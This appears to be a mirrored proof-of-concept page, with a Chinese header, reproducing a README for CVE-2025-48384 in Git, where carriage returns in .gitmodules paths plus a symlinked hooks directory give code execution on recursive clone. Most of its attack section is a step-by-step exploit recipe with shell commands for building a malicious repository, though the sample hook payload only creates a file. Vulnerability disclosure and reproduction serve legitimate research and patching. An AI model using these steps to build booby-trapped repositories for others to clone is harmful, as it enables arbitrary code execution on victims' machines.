关联漏洞
标题:
Git 安全漏洞
(CVE-2025-48384)
描述:Git是Git开源的一套免费、开源的分布式版本控制系统。 Git存在安全漏洞,该漏洞源于在处理配置值时尾随回车符的处理不当,可能使子模块被错误检出到由符号链接指向的钩子目录,意外执行其中的可执行脚本。
描述
PoC for CVE-2025-48384
介绍
# CVE-2025-48384-poc
CVE-2025-48384 takes the form of an improper link resolution (link following) vulnerability in git. Specifically, filenames with carriage returns are improperly parsed in `.git/config`, and including a symlink to point a git hook executable located in a submodule as the submodule hooks directory may lead to arbitrary code execution when the repo is cloned with `git clone --recursive`.
## Steps to reproduce the poc:
1. Create two repositories, poc and submodule
2. In submodule, create a `post-checkout` git hook to execute code when the
poc repo is cloned recursively:
```bash
#!/bin/bash
touch ~/hackedlol
```
3. In poc, add the submodule repo with `git submodule add https://github.com/<your submodule repo>.git sub`
4. Add a carriage return to the newly created sub folder with `git mv sub $(printf "sub\r")`
5. Echo `printf "\tpath = \"sub\r\"\n"` to .gitmodules and remove the original path.
6. Create a symlink to the hooks folder in your local .git directory with `ln -s .git/modules/sub/hooks sub`
7. Add everything to the repo
8. Hopefully it works lol
## Sources
- https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
- https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f
文件快照
[4.0K] /data/pocs/455395ed28f2f575c33a21264a2aaa4c82e04509
├── [1.3K] README.md
├── [ 22] sub -> .git/modules/sub/hooks
└── [4.0K] sub\015
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。